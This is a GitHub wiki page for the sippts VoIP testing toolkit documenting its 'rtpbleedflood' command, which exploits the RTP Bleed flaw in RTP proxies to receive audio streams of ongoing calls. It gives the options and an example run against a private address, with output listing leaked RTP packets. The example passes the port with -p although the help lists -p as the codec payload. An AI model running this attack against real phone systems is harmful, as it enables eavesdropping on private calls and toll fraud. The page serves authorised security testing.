Commmand rtpbleedflood - Pepelux/sippts GitHub Wiki

The RTP bleed Bug is a serious vulnerability in a number of RTP proxies. This weakness allows malicious users to inject and receive RTP streams of ongoing calls without needing to be positioned as man-in-the-middle. This may lead to eavesdropping of audio calls, impersonation and possibly cause toll fraud by redirecting ongoing calls.

More info about the vulnerability: https://www.rtpbleed.com/

Usage

$ sippts rtpbleedflood -h

Target:
  -i IP       Target IP address

Log:
  -v          Increase verbosity

Other options:
  -r PORT     Port number to flood
  -p PAYLOAD  Codec payload (default: 0)
  -h, --help  Show this help

Example

$ sippts rtpbleedflood -i 192.168.1.1 -p 10070 -v

[!] Target IP: 192.168.1.1
[!] Target port: 10070

[+] Sending RTP packets to 192.168.1.1:10070
received 172 bytes from target port 10070 Seq number 32138
received 172 bytes from target port 10070 Seq number 32139
received 172 bytes from target port 10070 Seq number 32140
received 172 bytes from target port 10070 Seq number 32147
received 172 bytes from target port 10070 Seq number 32149
received 172 bytes from target port 10070 Seq number 32150
received 172 bytes from target port 10070 Seq number 32151
received 172 bytes from target port 10070 Seq number 32152
received 172 bytes from target port 10070 Seq number 32153
received 172 bytes from target port 10070 Seq number 32154
received 172 bytes from target port 10070 Seq number 32155
received 172 bytes from target port 10070 Seq number 32156
received 172 bytes from target port 10070 Seq number 32157
received 172 bytes from target port 10070 Seq number 32158
received 172 bytes from target port 10070 Seq number 32159
received 172 bytes from target port 10070 Seq number 32160
received 172 bytes from target port 10070 Seq number 32161
received 172 bytes from target port 10070 Seq number 32162
received 172 bytes from target port 10070 Seq number 32164
received 172 bytes from target port 10070 Seq number 32165
received 172 bytes from target port 10070 Seq number 32166
received 172 bytes from target port 10070 Seq number 32167
received 172 bytes from target port 10070 Seq number 32178
received 172 bytes from target port 10070 Seq number 32179
received 172 bytes from target port 10070 Seq number 32180
received 172 bytes from target port 10070 Seq number 32181
received 172 bytes from target port 10070 Seq number 32182
received 172 bytes from target port 10070 Seq number 32183
received 172 bytes from target port 10070 Seq number 32184
received 172 bytes from target port 10070 Seq number 32185
received 172 bytes from target port 10070 Seq number 32187
received 172 bytes from target port 10070 Seq number 32188
received 172 bytes from target port 10070 Seq number 32189